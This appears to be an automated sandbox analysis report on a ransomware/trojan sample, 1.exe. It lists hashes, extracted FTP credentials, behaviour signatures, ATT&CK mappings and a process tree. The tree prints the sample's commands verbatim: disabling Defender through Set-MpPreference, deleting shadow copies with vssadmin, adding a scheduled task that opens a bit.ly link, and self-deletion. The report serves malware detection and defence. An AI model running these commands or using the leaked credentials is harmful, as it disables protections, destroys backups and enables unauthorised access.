Overview

overview

10

Static

static

3

1.exe

windows10-1703-x64

10

1.exe

windows10-2004-x64

10

1.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    1200s
  • max time network
    1199s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19/06/2024, 22:08

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    1.exe

  • Size

    275KB

  • MD5

    b61525d88761a974e57c8257c76ec999

  • SHA1

    231893b80d83f297ebdc760d4a1388afd98a4dd6

  • SHA256

    6abd97d20372a17384c5fd928ef5548da218b615247276acd7bf0a62ad3cf6e7

  • SHA512

    0ab047b99ef446056fac3f45b62c1c65fc8675c2fff938ba3c88fe600aa969b030b2d1474bece5305e40a2220fbbdaeb0584a1630fce3b53535bb9a27ee6b53c

  • SSDEEP

    6144:ITR3vnpRfE/UVPy/oCa+LDZWC9z5KIFXWBHdZ6Nba09IdkaNiTN:I3vnpRfzPygCa+DZvXWP09IGC2

Score
10/10
defense_evasionevasionexecutionimpactransomwaretrojan

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Executes dropped EXE 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
    defense_evasion
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 53 IoCs
  • Suspicious use of SendNotifyMessage 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Drops desktop.ini file(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4268
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:4732
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3536
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3092
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3604
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:5272
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:4480
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
          PID:1964
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
            3⤵
            • Interacts with shadow copies
            PID:5392
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
          2⤵
            PID:4036
            • C:\Windows\system32\vssadmin.exe
              vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
              3⤵
              • Enumerates connected drives
              • Interacts with shadow copies
              PID:5292
          • C:\Windows\SYSTEM32\cmd.exe
            cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
            2⤵
              PID:3088
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:5304
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
              2⤵
                PID:1104
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:5356
              • C:\Windows\SYSTEM32\cmd.exe
                cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
                2⤵
                  PID:4776
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
                    3⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:5332
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                  2⤵
                    PID:3764
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:5404
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2460
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:5204
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                      PID:4264
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                        3⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:5280
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
                      2⤵
                        PID:4656
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:5348
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                        2⤵
                          PID:3564
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:5340
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c Vssadmin delete shadowstorage /all /quiet
                          2⤵
                            PID:5096
                            • C:\Windows\system32\vssadmin.exe
                              Vssadmin delete shadowstorage /all /quiet
                              3⤵
                              • Interacts with shadow copies
                              PID:5320
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "02:39" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5444
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "00:05" /sc daily /mo "3" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5140
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "20:19" /sc daily /mo "2" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5664
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "16:35" /sc weekly /mo "3" /d "Sat" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2148
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "08:34" /sc monthly /m "aug" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:4188
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\1.exe"
                            2⤵
                              PID:556
                              • C:\Windows\system32\PING.EXE
                                ping 0 -n 2
                                3⤵
                                • Runs ping.exe
                                PID:5836
                            • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
                              "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
                              2⤵
                              • Modifies visibility of file extensions in Explorer
                              • Modifies visiblity of hidden/system files in Explorer
                              • Executes dropped EXE
                              • Drops desktop.ini file(s)
                              PID:5308
                              • C:\Windows\SYSTEM32\cmd.exe
                                cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
                                3⤵
                                • Hide Artifacts: Hidden Files and Directories
                                PID:212
                                • C:\Windows\system32\attrib.exe
                                  attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
                                  4⤵
                                  • Views/modifies file attributes
                                  PID:5300
                                • C:\Windows\system32\attrib.exe
                                  attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
                                  4⤵
                                  • Views/modifies file attributes
                                  PID:3772
                          • C:\Windows\system32\taskmgr.exe
                            "C:\Windows\system32\taskmgr.exe" /4
                            1⤵
                            • Drops file in Windows directory
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:4500
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5608

                          Network

                                MITRE ATT&CK Enterprise v15

                                Reconnaissance

                                Resource Development

                                Initial Access

                                Execution

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Windows Management Instrumentation

                                1
                                T1047

                                Persistence

                                Create or Modify System Process

                                2
                                T1543

                                Windows Service

                                2
                                T1543.003

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Privilege Escalation

                                Create or Modify System Process

                                2
                                T1543

                                Windows Service

                                2
                                T1543.003

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Defense Evasion

                                Direct Volume Access

                                1
                                T1006

                                Hide Artifacts

                                4
                                T1564

                                Hidden Files and Directories

                                4
                                T1564.001

                                Impair Defenses

                                2
                                T1562

                                Disable or Modify Tools

                                2
                                T1562.001

                                Indicator Removal

                                2
                                T1070

                                File Deletion

                                2
                                T1070.004

                                Modify Registry

                                5
                                T1112

                                Credential Access

                                Discovery

                                Peripheral Device Discovery

                                2
                                T1120

                                Query Registry

                                3
                                T1012

                                Remote System Discovery

                                1
                                T1018

                                System Information Discovery

                                3
                                T1082

                                Lateral Movement

                                Collection

                                Command and Control

                                Web Service

                                1
                                T1102

                                Exfiltration

                                Impact

                                Inhibit System Recovery

                                2
                                T1490

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  3KB

                                  MD5

                                  8592ba100a78835a6b94d5949e13dfc1

                                  SHA1

                                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                  SHA256

                                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                  SHA512

                                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  aceeffc4dc3ea66c804cb1c296f0ba42

                                  SHA1

                                  80e30f0547bb7c1aa00cf704cc2b2fb68bb3b914

                                  SHA256

                                  2c2f947ed23f9d7a9c5a3b8ea581034d919c2fa66d941c1c320f73c0eb0a5159

                                  SHA512

                                  a4aff8b8ecbb48ea232940a154fe1bb180d80d05d8dfaca3c2c6885a589c36a2a4b5c8def7e2d3b2bc1214b93be1d158e140b3b7413db1fe1cd0bd93c9e9fd52

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  0ffcbed36512e6246c9b86eb2735480d

                                  SHA1

                                  dee6c5ab9aa47b42f291a364d52a137c010cd8bf

                                  SHA256

                                  fa3dca6c7f0185d577f214b7d5fc8616e84e10dccb466f3f4af8d8243e7cba38

                                  SHA512

                                  03e4508f558d4a53db5bec5e2192dd140795dacc2790a7915fcca3669bf7f77fb3a102d3468e03b2e4edb246533712fe6d04af6b5f88465c9c8c5ecd2f6cef02

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  de034f7e32dc04b2279c9ef6f62bff1c

                                  SHA1

                                  1bfc256e106703c7342f630210308c02f6e2fc82

                                  SHA256

                                  29f1d37cd09bdbbf7fd3eb27774617b5a8884cdbd284ed679ad91eb388c63f6e

                                  SHA512

                                  51df10895ffe0f51b95271250a1296bce676770cb4a4c3e98e6f92df3fd1bbe8c6b4584d0bff15916be8023b2ca7d2651dbf09e649797305ba8bac633dda3ae9

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  ab201310a00744ceb9766fb481b31adf

                                  SHA1

                                  1d577a7dd9e02787e730afd7c54648bf1b5b1fb0

                                  SHA256

                                  9f39e165eb4754fa87d86b0719ed68658e22083595fa4605637d1832ac9023ef

                                  SHA512

                                  dfc3a80a1cf68cfb5dfab1db1369ed477f13aa094144ee549705e10576a17479b25653aca5b2211ad8670b62e9d4cca5052c101dadfffa90c7878f97b3da2d8b

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  0c71ec2aba024b1401fb514fcfd3f006

                                  SHA1

                                  16df9c3c2de9d442cccc08cab4021fe067bcac3f

                                  SHA256

                                  52371b272f4ee46e5e071ed0257dff30928b27a78ad31f6e7f3c4e6e6b1e310e

                                  SHA512

                                  1a7c2185b0d9cbbdb6b629a5af02c91b174427ed54bfa7691b681decc40cbf5bcf1c482bb762b2171ddb7bf3d729fb2919accf880fe498c38ccde4293f775709

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  02c2c30ae8a5f0f8d8cee3efdcfb6de7

                                  SHA1

                                  818fbe85c0230ddde80597dc99417119ccecf429

                                  SHA256

                                  75ffc42d0c35d6df353f7acc17bc00db71b82bcf09ad0b3f130c44fc2f751e45

                                  SHA512

                                  41d4cd0d4acae614cdfd65386134d7d508779c415bc0faeb3547874d715adeae4a47b8466306a091fa959899845325a1579abfe8f7d4b575e69b78e2d7ebcf46

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  f2f3d502745bd1a4b75f1c62375862e8

                                  SHA1

                                  c5908f438458925e0fd2b3ba690342c96989ffd8

                                  SHA256

                                  3e480081f788a11a70ef241206603a0439583836caaed8fed0520b95d783ebe8

                                  SHA512

                                  39a7693f9dc0c08b240202bb662e41c89a6f3d8b51e2d911698dc43f5a5f3aedd2046e63a8f636d234e8eb3dd7409ad7a4426f3f510595920f83d1d11feec601

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  f6b31b2fbb43a1345f8c9460c37a1ac3

                                  SHA1

                                  c49c9ad025cb8160d98b5cd8b3b5f69e6e62a86c

                                  SHA256

                                  e0942628ca82ef4a4b45c7aeb622b37db5bc35e6277d56c98d5f29567bcd4505

                                  SHA512

                                  d10f1203ba3881ef59edddf3ef49d994f86f7afd0d39a2796c9aca33bcb476915537e9d5b793113dfb7f6661edc7fc7df5c3b62b0be4115c445acf29e9f8ebe9

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  bd38ca31bc247393e51b07d8de7f059d

                                  SHA1

                                  9c72aaba4ea96581f207e30125f2c2cbed1aa379

                                  SHA256

                                  668a2181001a3adde7a0feb23ea479ca646956282814a09445c6814080e0e283

                                  SHA512

                                  1cd2368448116b119cb364654c763fe36aa8e92f465bc6ebd504f61595365018831a4ebe8145d29548bca9fa1fd4789fd19fe7a340f05d4581de1fd9b98bd186

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgeeupf4.jsp.ps1
                                  Filesize

                                  1B

                                  MD5

                                  c4ca4238a0b923820dcc509a6f75849b

                                  SHA1

                                  356a192b7913b04c54574d18c28d46e6395428ab

                                  SHA256

                                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                  SHA512

                                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
                                  Filesize

                                  275KB

                                  MD5

                                  b61525d88761a974e57c8257c76ec999

                                  SHA1

                                  231893b80d83f297ebdc760d4a1388afd98a4dd6

                                  SHA256

                                  6abd97d20372a17384c5fd928ef5548da218b615247276acd7bf0a62ad3cf6e7

                                  SHA512

                                  0ab047b99ef446056fac3f45b62c1c65fc8675c2fff938ba3c88fe600aa969b030b2d1474bece5305e40a2220fbbdaeb0584a1630fce3b53535bb9a27ee6b53c

                                  Download Submit

                                • memory/2468-13-0x000001E6FF920000-0x000001E6FF942000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/2468-16-0x000001E6FFAD0000-0x000001E6FFB46000-memory.dmp

                                  Filesize

                                  472KB

                                  Download

                                • memory/4268-1-0x0000027FC6C20000-0x0000027FC6C6A000-memory.dmp

                                  Filesize

                                  296KB

                                  Download

                                • memory/4268-0-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp

                                  Filesize

                                  4KB

                                  Download

                                • memory/4268-7-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

                                  Filesize

                                  9.9MB

                                  Download

                                • memory/4268-568-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

                                  Filesize

                                  9.9MB

                                  Download

                                • memory/4268-290-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp

                                  Filesize

                                  4KB

                                  Download

                                • memory/4268-574-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

                                  Filesize

                                  9.9MB

                                  Download

                                • memory/5308-579-0x0000024E643C0000-0x0000024E643DE000-memory.dmp

                                  Filesize

                                  120KB

                                  Download

                                • memory/5308-580-0x0000024E00530000-0x0000024E00A56000-memory.dmp

                                  Filesize

                                  5.1MB

                                  Download